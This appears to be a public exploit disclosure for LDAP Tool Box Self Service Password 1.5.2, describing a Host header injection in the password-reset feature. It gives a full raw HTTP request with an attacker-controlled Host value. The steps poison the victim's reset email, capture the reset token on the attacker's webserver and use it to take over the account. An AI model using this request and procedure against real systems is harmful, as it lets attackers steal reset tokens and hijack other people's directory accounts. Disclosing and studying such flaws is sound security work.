# Exploit Title: LDAP Tool Box Self Service Password v1.5.2 - Account takeover # Date: 02/17/2023 # Exploit Author: Tahar BENNACEF (aka tar.gz) # Software Link: https://github.com/ltb-project/self-service-password # Version: 1.5.2 # Tested on: Ubuntu Self Service Password is a PHP application that allows users to change their password in an LDAP directory. It is very useful to get back an account with waiting an action from an administration especially in Active Directory environment The password reset feature is prone to an HTTP Host header vulnerability allowing an attacker to tamper the password-reset mail sent to his victim allowing him to potentially steal his victim's valid reset token. The attacker can then use it to perform account takeover *Step to reproduce* 1. Request a password reset request targeting your victim and setting in the request HTTP Host header the value of a server under your control POST /?action=sendtoken HTTP/1.1 Host: *111.111.111.111* User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 16 Origin: https://portal-lab.ngp.infra Referer: https://portal-lab.ngp.infra/?action=sendtoken Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close login=test.reset As the vulnerable web application's relying on the Host header of the password-reset request to craft the password-reset mail. The victim receive a mail with a tampered link [image: image.png] 2. Start a webserver and wait for the victim to click on the link If the victim click on this tampered link, he will sent his password reset token to the server set in the password-reset request's HTTP Host header [image: image.png] 3. Use the stolen token to reset victim's account password Best regards